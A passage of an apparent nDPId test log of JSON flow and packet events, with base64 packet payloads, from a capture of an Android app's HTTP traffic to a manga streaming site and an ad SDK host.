{"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/vendor.bundle.js?1644807874","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile 
Safari\/537.36"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140835,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":434,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":434,"midstream":1,"thread_ts_msec":1654385140835,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/vendor.bundle.js?1644807874","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140836,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":436,"midstream":1,"thread_ts_msec":1654385140836,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01055{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":502,"pkt_l4_len":468,"thread_ts_msec":1654385140836,"pkt":"tKXvZygQnLbQ0+MzCABFAAHoPA1AAEAGi0rAqAJ+oXUNHbFuAFD4VTA0r32OCIAYAfZzkwAAAQEICrrGFo2XERf6R0VUIC9qcy9hcHBsaWNhdGlvbi5taW4uanM\/MTY0NDgwODIwMCBIVFRQLzEuMQ0KSG9zdDogbWFuZ2F3ZWIuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiAqLyoNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140836,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":436,"midstream":1,"thread_ts_msec":1654385140836,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140836,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":436,"midstream":1,"thread_ts_msec":1654385140836,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140850,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":414,"midstream":1,"thread_ts_msec":1654385140850,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01022{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1654385140850,"pkt":"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"} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140850,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":414,"midstream":1,"thread_ts_msec":1654385140850,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"tcad.wedolook.com","url":"tcad.wedolook.com\/js\/websdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1640,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140850,"flow_last_seen":1654385140850,"flow_idle_time":7580000,"flow_min_l4_payload_len":414,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":414,"midstream":1,"thread_ts_msec":1654385140850,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"tcad.wedolook.com","url":"tcad.wedolook.com\/js\/websdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 02226{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1654385140963,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1363,"pkt_l4_len":1329,"thread_ts_msec":1654385140963,"pkt":"nLbQ0+MztKXvZygQCABFAAVFItxAADQGrR6hdQ0dwKgCfgBQsUzC7TqsQ\/Mw2YAYAOvLegAAAQEICpcRGHq6xhZUSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9jc3MNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBGcmksIDE2IE9jdCAyMDIwIDA3OjExOjEwIEdNVA0KRVRhZzogVy8iNWY4OTQ3OGUtYzJlIg0KRXhwaXJlczogRnJpLCAwMiBTZXAgMjAyMiAyMzoyNTo0MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9Nzc3NjAwMA0KQ29udGVudC1FbmNvZGluZzogZ3ppcA0KDQozYmYNCh+LCAAAAAAAAAO1Vm1v2zYQ\/mz9ivvSpTMkS0kLrFCQAe1eiqApECzFin1kJMoiIpMCSUW2i\/z33VEvlj1JGZbOH+KYvHv48Lnj3YVLD5ZwV4uSa7hY\/bSK6PdndS8KDlZVSQ6mECluMplCptmG10o\/QC1sDjnTac00B5YkvOCaWZ6C1UwaYYWSBqEILbe2jMOwruuVSJlcc61WlQkbXPx2h4et8S+q3Gmxzi1cROdRgH\/e+vBnwVKxERo+4ZEF25QiFYT8Jecgfu0hZw5r0W9EwqVBlpWkO328vYEf4PP1l3b7D7wFo20lY3hfrStj4U3kE5W33jL0wiVcvezjfWBGJJ3gd3ZXcAPeyzCvrpDaqpExSJS0TEi83DdvsWF6LWQcAausuvQWpWoiE2teMCseOa6pR66zQtVxLtKUS1wJan7\/IGxwz5KHjCU8eBRGYEIIuxsYbdT+OQvzjIGa3589H0Pxu9iCyuCrYwtZIZIHroVcA8qx2AcCQ7yNzy+9p16cWrOSEh2lGZOiFqnN4\/MoejVQ4ZDPQakVeqMKnUJuL1N640PBM+vjiynHXdMKXwe+iTgypwbkHzskjAl\/k76Oyq0f+dGPp4buUQUWH4JcB1klEwdICYuWGDaKyCjbfmOEar\/XoJ\/w7HdnSfZWzzFU4\/za5RF2Rw4n3AZek\/Id+U8oF4wCNVEotxQF0t
aMU+\/WR7h3W+PCtnjzuh4dOkHfW4zFfCIzB6bHavb2U1IOPMeJDOqG2gZG7DFLY6ByxCXWErWldKZMwX8ntid3Di8405wjSsrhZ+hK3uBVHz3M8WwEejCBqmzHZ+Zmx7az0TgynU27oeW\/PLut49AV8oMerolSPcMSzmzsyhBdrCvhk1r\/91BQF7z+7TyCr1hhVW3gNleSwzuqx9jMBr2oLt8FudJiTz2pIJbuHdFUEbCmekHJZLA7qtHohC3JimTOBbPpyfse\/fgvVWlIsNGrDRjXjn3IOc40O1WB5DTQKDAlT0S2c9nsmuuZcfOQU\/\/MeJjt3Ph4F+y2rsz7wG2y+t\/6OkbgrqXUjG7I5w45xKS+twiXTSe7iLCVYDbknAaqGLCz4W80GcmfISQNfGYIiRWwwyQQao8DzFcjkC6+j5xi3iPj3ENRx9Uma0luVySoX59yaoYOHEJPENwsgsv\/gFh4CIFnvXCW8m77IEIznn3PKB4yJMB5zeJ03V6PpNjzQQbBfWUtjaHL0N2sK3aNgifeLhcO8jauTTo3AEN5WwUnIDp9RzH+Bl7SBF8uDAAADQowDQoNCg=="} 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1654385140978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385140978,"pkt":"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\/ChLWpoBGkU22JJ9tsItYUqtlydZkdduSNwh5YSgMJAiQANiDCPq3n+eNHCoLBCV7n3PXvetqIGrIyjEy5oj8j6dP9vcu\/nJbLN\/vvTk5OuG\/vc1efdDYe3Z8\/EnG35OPw\/svFrfzYW89Xcyzva\/mgyMKXtzoy6PFcvx0Nh0U81Wx9+Tpf+yPbucDlav3sn7jrrboXxSDdS3P1++vi8Vo72oxvJ0VBwePvDgq3l0vlutV25ULt3nvaLgY3F4V83W7T837x41W2VDjbjqq75dFGuvJcvF2b1683Xu5XC6W9Zof5bK4uZ0ui9Veb+\/tdD6kzNvpesJdqLzWOF0W69vlfI9WGvct+1uvMfZiNJ0Xw9p+GIf7vu1+WuvJdJWVHdLI3\/SWe4O8082G+eBopRnKCq4Gi\/mgt85GXF7fribZmAu6Urz7bpRN8rv7bJpPjtaLV+vldD7OLriZ9FbfvZ1\/v1xcF8v1++xShWZ5zS1YLbvKq+36\/mvwV0ejOZVP17YW99k8f\/pz53x1fvvFyy++OH\/36XG3udm6\/+DpOFtQ7PBqdfg0u86fHtY758Pe4S\/dxtPxNLvZ3VifHv\/1mv696K2KeuP+VC3nV0fXy8V6oYXP7xy0tGYZE7BaL28H68WydZWtihngwWWtls2K+Xg9aR1n68Wny2XvfbnCjTs\/quHRoDeb1TXdjftsXKzLMr1YaH47m+3nvfbxWa+tkp1eUz9Hrv6uLVan121VK9NqvFr3BpeVKrWKfUZyVSzHhbWrFQwDqDeyXgkxDLd4853Be24A0VfZdfFubbfhJuvfZ0VvMEnaEbz4EV4d6Z21lGkH3WdXveukaCxoQ4qdrtPF3rX7LMJDPxvE4j03czxSpQ3qNZgsa44ltyoeHvWur2fvfY+WY9uEK1Uwmi5XyQJUKyhu6seUmfV+tcjhCWWKm7IX
rKKb8mTFskHe7DXrWs5+6zjO91Y\/B2f58cFB\/2zQ7uhNZ9DttjpdVT8flvVXO1ku2GZj1aVrKzDic01xa5StwEotNjI\/2epa21l3dsESgafWtAOgsOP8dVwGNyQWk7kfZkU2YtP3wkR2jrubDTt6kp+w9eNjD6wggP2T05FQWH+xmBW9eYlJxwcH9Yt8XKls4itrNhvZAww73myujqarLwKCHjc2m\/oYdNKg9TyfUt\/YAe7k8LBxOj2bnE6oCNzqdlS9KPvXmXQbDfVruDed7xWNXj7uDLusVKGf8X6eD9S9gwP9qNXvZ73p3G0OKAwNa1dNV7bRedBotOt9\/mO44MbewUH5stdo97SSrfg8rcveMn9qnhrd3NcvmGQqbb1ZTId7x743VoSnAcWPy4Wr30F3elCElicVtWZ91vymt54cLfX4qt5oHC2L61lvUNSfnn8OlqzVGtl09UPRG75v7R9nhQhNCWfA8TYRgp5k"} 02437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1654385140978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385140978,"pkt":"nLbQ0+MztKXvZygQCABFAAXUMwdAADQGnGShdQ0dwKgCfgBQsVapSjEtYxvrg4AQAOu7rQAAAQEICpcRGIq6xhZj88Ui2cwNofu4HpWPHTaoBRhi1RmcMKnIEh85BGl\/wyxuNqE0ZTw6qfWESB98\/aMRvx0N7nnceXDQy6G5jrqpvW\/Z9svpYMcn++lK8d3hdW+5Kr6YLXqQnQabUp+\/vLpev3erX6nC9rrBd19w1Gu4cQPz\/sK+TtZ7x9dG+zebAO4sdpypzaZ3NF8Mi9dMnAN+N3I6Vra0Xr4X\/wCCLBH7wcH+hUOYvayWPK81kjfpByWpy2oAe6B7341qZUv3EH5Qe8TJ+yf3tHt5tHg7\/xo0adupMg17sQ\/9RjpJAYAddAMa\/c0mKXqfCVAqM+WJi1aXdW33mrVaK0xYZM16TGIAoRLN9NqTztTPRQP0Ej5rqREYuh57b7bo92Yv3\/RmZaNQtL52MXzMVb3PtDHBxbti8GqwnF6vE1ilIG\/4Nsy3yBNf3GeD3lUxE0dR1hoBe68Xt+Miq8Gs1Mr9eZ3d2FYbFt9SQ\/JxQmYdXOg9IGswomvYmK8XbwMbo4mtPtlBuEViBcUg9vxYqCtg7nG+BMxOWWFK8HfcuBO+PB2dFaeFQ6tD6nfEtdcpQJ4NeMUcDNjoL4ve5X0xg6XWN4XbG1Tyr3zxeFvGO1lTRaaff629X\/8qwCJgoKVOZjvgIMMpgjpgri7IK1dqLiwqDueycAgtgJ8THjSvAwF3pxuaifipvqx7asJebgcGbZDV4M3gnFP4Fa\/Xg3w4ABvAsjWyAVhp\/rDNuJpaNyDT5tJvnrH7vg9bNnDbUavhmEoI3wB+c9A2knHVe1c\/zobNQaM1aB2fDs8GpwO34gOtJPuiD3vCUgd8tze4d40cnjAbYjWTeRTUuploxuaGwBrU2Ld++nYynRX1wdmwwbI2m9283xnyY8An4tdwBSI15HV3q6gfZKgyB0LY2JC8Sk80P4LIAPGINyO6Aj8TJmKS7w9Ox2ej0xEjHub7SFCdEaWANXoyOTgoTO6xp5ESF4KBhy25Vh40oH0FrwRQsDwTQ5tJi6FBbScHLcODg6lr
dNg4jZtq5DYVa+h7+MgHfmIKv1MZ8RSQHd9Oh62TDAHnXSKnmMhrayU2z8PsA4hk\/esgik6\/m\/XzXtbLmRwR0S8CYwZPUx\/kXjyJLGH2rMGaxx0St1fP94x9Ih42CzJmfbsCmCwQ2JG6znolPyKNum02syLwTOJV3pZrH1prSq78vLdmxVa31xLVW5fwj15qqX3mmNQ92IV+sdxzUuxeGNiebTj7fO+HYvzy3fWe28NOTK8ZP72u1\/ZgreI4bU4nnVpnYZLVXq3Zb9a6NWB8CzezJ\/0E7glCvBwRAXNQsgVhYUJ58UeDLf6gvX\/SOtEWjQwEu7a9f9wqWSo+OaYE816b23hLpKMtfiZx5PDEwOxeQLEqFy90r5QIskk2zS6yy2yWXWXzbJFBxbJltsrW2W1eW01\/+WVW1JqHYfqzN\/QsaC2yt+zBd\/z\/Ph\/3kUl\/cT+fup\/PkmZTCqiuA4mzHGVKBp\/1Ik\/0HNnn+cnz5x+dZC+RD7ZVEF9IrfHH\/Iuj68V19qV+pcn4Klz8iQun8PgzV165kVB8Bh9wSJ9OD5x07BDp6eCsf9p3yNLEuH5Xi+C5tb2+Xzrhya\/z2mBSDC6L4cZpEbjord7PB5ve7XoxQl20siuY9vcbCeLLxWy1QZFTLDfD6arXn\/HBZDocFvPNdAX+2czgzjdXt7P19HpWbNC3zDcQ4uFiPnvPhamOaGvAi2Et+yavdc7P3z07Pj9fn58vz8\/n5+ejbi37Nq\/V261z\/jlCuXL+9rC76fxMwePjQ\/72jruNZi37Lv828i+1t7Ws9vZ3wPz3ee38vFNrftOsPanXmt82aw2q8vedJz9\/sNn\/Z7edN\/yTduvDetkUbZyff9htPGl8uDmvbb84r+nNeW1Dvd9Rb2Pjazk\/p89\/ySHNscHz"} 01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1654385141007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":758,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":758,"pkt_l4_len":724,"thread_ts_msec":1654385141007,"pkt":"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\/kKkY1lcOW8W2K6iCGFbEKhTTelFEUau3ISyUiy0xDy7x2l7mMj5nnuXB2VlubIiu3CnbRYaeXJPSkaLbwymsbk3CPkIWcKGzTEhPC6XskQEDIn0Ww4uRveDqbT2WQ2GI+i5DojjNkp6Ga8beC7\/FlsD\/trFVf\/yi1Yh2qhgcR2zEYRUi5xhi9qL+p62YL2ju1N+chLeFFwpNi9ZL0e\/b1VJsQlRMn4jGstt6TCtKgc+pGsBL\/cwyFQ8tMzL9f8ANTFr4O3IKIKQv\/P5KeVpEhC+xZ8Y3V2wakOJSxwDx0NGRk2mJIoo2SAYeaswLT\/4X3t5mkqjNYgPCu4gC3+DNPgU9Dvm6fUyR2rXD\/s4ams5hZPXBsJ+OMOrM+hMBZoZyV4ptKIJhhJSOSEVbWPMPpB31QOkVEcZ1+K5mSs2QEAAA0KMA0KDQo="} 
02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1652,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1654385141021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385141021,"pkt":"nLbQ0+MztKXvZygQCABFAAXUlr5AADQGOK2hdQ0dwKgCfgBQsW6vfZ7o+FUx6IAQAOt7dgAAAQEICpcRGLO6xhaNHCwI16MrW77BnSuFmzoykUoRY8lU4Y9BxcNRoFb0Nbq9knEDoYSbOgMHRrfnqOX3O+WBrjxffQX3ReCDHd0huHxstQ1Cl\/qCI3JJYcSFoSljElAiEYABMWaZUpwIs4TWVvNRU0E04f1s4mMZAPH8ZJv5kyEw4gxQnp7DyGbCSAzEhQ5WUtEp01gvCvJqkcZxoD1kB06PnkkrzDYXJQ1MGeJC6VFSWBTzBI5Z\/t3F+8naQaVSej\/ZftVcv7yv6uvTr8ukGGw01mXvTeuoCfsSOEbkIIlD7bAu9Acq\/qe\/\/9tf\/vWf\/uMv\/\/DzX\/zjf\/7d73\/563\/\/+ff\/hj0vun\/547\/86W\/+Yb77GfUjZ9IbTlBLryo\/\/9U\/\/\/KHPyo4YDi9BWaPWNxINPA8fGxGZ7Ly\/JDCsRwhxAvaM\/YA7tqsMUg+6kiqQORpMzNKot+7rlaqj0ywsK5nZSWXoBx4yLtHs0A1l1MExo6hxy1Y+6cwLT5PmWU5lzTJcMbDYoWUtJEK6o\/8CNXxauRGQ0cX327o3cirwlH6GNFTjT\/FQUFu+D02rEOW1fzNC6TxCmRspFbl5W+KvIPl9kxlJpEnpfhE0oul+9LkWYknx7owSteNNIW2KSX+thqUDaQMFsv9FVgu6+WLMsh50uyUzosn30zQrKOV8NJfnjorMfQlpB3jBuovbdAQKf0mZf4E8bdX8MnmJCHlCzeBIc75UTYvkwSkhvkc4Gx6j9Cz1SsqnHNlRu6WbaMag6X\/qkQxl+sgsO4aEiWUuZyfTPDf9aPIHyEhCyCaT+jJ7IwzKtAh5VEKYv37uP9EdZIkYgSU3iX5Ct6pHjTN9AbOECnmGwjuRTi2vATBTJqVpULrVSR8UYLi2oWvnC36N4eLRPWsLkAnKG1hCyovNCdpm+gQNK3Ss7werCGrELRCooVpRJUaSEDJtiERERNCK+O1yZFU9f+tpLipmZNUos7xA31tQvlpFJ7hJogMtSrZG\/7BjdRA2gc7bLCquzRTwmvpJTiAcI8TcaZcJLU8JLE1pEHp8d6mkiSV0txWpNM3dogujMbcYlr6h5BVLCXtO1Rvtk8jkiaWc63H7cyFxW0g9Vk9vcfOCtUzvSJcXVET+wKt4ryhsc0Am1stFnslTwBoBq8eRFlr0eP37hgejifz5D9GKMJ1rm3rjoqoT+Ft4tMGXWn74uFs4oB+anrn2Chr489nV6hJ44+vApc\/nOLjzoAeedFxBMzYq65n3lfrCr670Wt1BV836qt1JcCfWtwqmmuifZW3p+QhhBBdEXGg4VvLm1j4YlBXXjndQDy2qUYbTc1xgFJ10M7I\/RZFeDRiMiTw5mQwIRqUUwcxACoLw\/NxL\/L50xFy4KJxH1+PsUfORt+8t+VqKiE\/uqz1jQ+qpte0qb6fA9E3hqoW+50VHY6n\/iEHjGsHFRkzlQDUMAeKhBkv00XfuFW1y6l+lAPI+orVqX6a05ksCVCA9Mud2Ya6El0pU
\/02Z6xMJ6o3p\/qneSCUo5Gql2JFFu\/E3CukH39EHhffpinlahk7VCtvbaw56y9fVqb6OxkXqSWSH8YnCLdrrm6sFfvGoaqVLKawnl3TUViuPmkOLlaQ+\/CwqZWq5B93X5g1hLtn2OH96Cp1ky1V5RsGYyw2xrNfmmuIcr40N0oegoSgJClDlPClnJaqxGutvApuxcWHFS+qyjtFb6Mk02DlQioQEaG8xLJM+XGRexW6Vi0C5IW5uqNaRUxc3qyrVkndJCLwopEEp1P9lSxDMZLWl28frDhK\/KA0oxwwrszoZ8rczoHoG69mlRmlWWnYQ8yXShX2I7rCYkMTIxmQFtejdYApy4HGTQw1qQJbbYuvfLIO3kp1ZcV7sfXw8EzFM64z3svNBHxVLJgYvcqkcjg7OSIBxo8IE3CoZ+rdyiqlP+6e"} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1654385141022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1421,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1421,"pkt_l4_len":1387,"thread_ts_msec":1654385141022,"pkt":"nLbQ0+MztKXvZygQCABFAAV\/lr9AADQGOQGhdQ0dwKgCfgBQsW6vfaSI+FUx6IAYAOsf5wAAAQEICpcRGLO6xhaNww8lvHfP1yoVTdup1qGXP8qj53hMV3qq381D5uoEs94his4dlQyHNT+skIrlDVX+IlpUre4o45FSV6wRdmczZ0zfQN7NiPxzHJAiez3Vd2VAErzf75sSVaRwn3zPOe73EdfAYm1UtG82+Ne90ZVzily1Z4fSMgl6WCVtMSWz7XpwrkAoBkvNYjzwYl62d7soAjSZ4sMrxBcn6SSwBcYaCxsRzEvaA\/RQMvHEdi1eXlRYWzFuE+XGBBcfiKZZZTCofqooReqhwbmAtRhQwInVpTFTfSBLbm7dhRieV2sPD9XaVH\/9FOipfpUDxnceaqbZznuzACIVtZiaQbtLoZOFYfDhUvhkxRj8sQzPfAWTyGXrB4\/6EUUqb6DQGrsIASeSf0r+rMbh2weUfZaUYsQ\/bsBLkV6EyLESJ7NEHGP\/Hif7t3Asn7BFbJFi0rLKuOjJCAReZgGKNG\/fGNGJxJ5wHy8qZ9RGhotQ9Q03eYJ64\/2ETr7zHJSSOc+yq2rMosPdiidnbmIad7t4\/\/5yR72wSp+apT+\/1BCES+xqpPO6\/+iZiQeMN0NmC+lr8f5FiE+vqI2eQFYcdQGMmAl\/ZC+V51WanjW8w90f\/Nyn7rGrh7qvD\/RAt\/QRXM0L5TXLwiTQx90P+PUF5dIMGu5FcGnS\/x4eEkqBi1qMn1iH8RM+B7nU+Kdg+JSVfS0RQnIMZmhWv4lP74ZlhkYvUxzsa\/oIjTgQRblwuHt3Zg2OEAFTfe2ictmwDCu883r4NQDLCIOeSXW7KGpCrcER0q8IT6HuKNp14I\/jAwywg7AwD6rrcemjrtCvKYzJHyyXb29vRc6pZMXCYRmf9O0DfSg4oCqLgYXPghi9aDlvljZWK9XN7fXVUnUDDVRnK4DoKwC0jPE5EkvKSNcF3Mx3+W9sqOK3NvhVAUW74t1cFt0Rv9nBLSbHFX+LlhkaF+xIgSExVBdTFVk5GMrr1HR6+B\/p5QYJ7f8F1OZRWYqll6X2iP0gifg8\/EhFyTo7+4a2t1Ss2Z84YdL1nirX7FgUm6DKTojV00qeLFLodixSTpxgZCl9j
